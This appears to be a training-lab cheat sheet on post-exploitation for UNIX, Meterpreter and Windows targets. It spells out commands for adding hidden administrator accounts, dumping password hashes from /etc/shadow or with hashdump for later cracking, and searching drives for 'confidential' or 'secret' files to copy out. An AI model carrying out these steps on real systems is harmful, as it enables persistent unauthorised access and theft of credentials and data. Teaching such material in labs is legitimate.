Exfiltrate & Maintain Access

The following table describes various actions that can be performed to exfiltrate sensitive data or maintain access on systems that have been infiltrated.

UNIX
Meterpreter
Windows
Modify/Delete Key System Files
Look here for web page HTML files:
/var/www/
Look here for DNS records:
/var/cache/bind/
Use nano to view/modify key files.
nano fileName

← Look here for Linux target

Look here for a Windows target →

Look here for web page HTML files:
C:\Program Files\Apache2\htdocs\
Look here for e-mail files:
C:\Inetpub\mail
Key files can be viewed/modified using notepad.
notepad fileName
Create a User Account
As the root user, execute the following command in a shell:
adduser username
In the meterpreter shell, execute the following command to drop down into a Windows shell on the target:
shell
Now, in the Windows shell execute the following:
net user username password /add
and set the account privileges to administrator (root):
net localgroup Administrators username /add

Return to the meterpreter by entering exit in the Windows shell.

In the windows command prompt, run the following as the administrator:
net user username * /add
and set the account privileges to administrator (root):
net localgroup Administrators username /add
Obtain Account Password Hashes
As the root user, execute the following command in a shell:
cat /etc/shadow
Copy and paste the output in a file on your virtual host for password cracking later.
In the meterpreter shell, execute the following command:
hashdump
Copy and paste the output into a file for password cracking later.
In the windows command prompt, it is not possible to print out the password hashes using built-in programs. You must use metasploit for this.
Search for Sensitive Information
Search for files in probable directories containing "confidential" or "secret" with the following command executed in a shell:
egrep -r -i "confidential|secret" /home
The output will include full pathnames to files containing the word "confidential" or "secret". Use cat to dump the contents of the file(s) to the screen. Copy and paste the contents into a file on your virtual host.
In the meterpreter shell, execute the following command to drop down into a Windows shell on the target:
shell
Now, in the Windows shell, execute the following command:
findstr /I /P /S "confidential secret" C:\*
The output will display the line containing the searched word in addition to the pathnames of files containing the search word. Use type to dump the contents of the file(s) to the screen. Copy and paste the contents into a file on your virtual host.

Return to the meterpreter by entering exit in the Windows shell.

In the windows command prompt, run the following as the administrator to search for files containing "confidential" or "secret" in the entire C: drive (includes all subdirectories too, so this may take a long time!):
findstr /I /P /S "confidential secret" C:\*
The output will display the line containing the searched word in addition to the pathnames of files containing the search word. Use type to dump the contents of the file(s) to the screen. Copy and paste the contents into a file on your virtual host.